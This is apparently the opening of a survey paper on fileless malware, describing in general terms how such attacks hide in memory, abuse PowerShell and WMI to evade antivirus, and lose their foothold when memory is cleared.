A Survey on Fileless Malware Attacks: Malware Hiding in Memory

General survey stat that fileless Malware used for bypass traditional Anti-Virus but it isn’t new. During the last few years, fileless malware attacks have been on the increase, and by Proof point’s approximations, pose a higher risk to businesses than commodity malware attacks. Fileless malware attacks will overtake traditional write to disk attacks if they haven’t already. Fileless malware infects targeted computers leaving behind no artefacts on the local hard drive, making it easy to sidestep traditional signature-based Anti-Virus. The technique, where attackers hide their activities in a computer’s random-access memory and use a native Windows tools such as PowerShell and Windows Management Instrumentation (WMI). Sophisticated attacks advanced adversaries were first spotted using fileless malware several years ago. But since then, there has been a steady rise in the numbers of attacks, according to experts. Slightly code runs in the system’s memory and executes programs already on Windows such as PowerShell and Windows Management Instrumentation (WMI). Using these programs, attackers gain a foothold on systems to carry out a quick theft of data, or establish a persistence links on a system by leaving a backdoor link to a remote c & c server. As soon as, malware hidden in memory it can traverses from one process to another process for hide themselves in different places. However, these type of attacks have one large disadvantage: When the system and application is turned off, the memory attack ends. To work around those restrictions, attackers often will traverse from one application to another.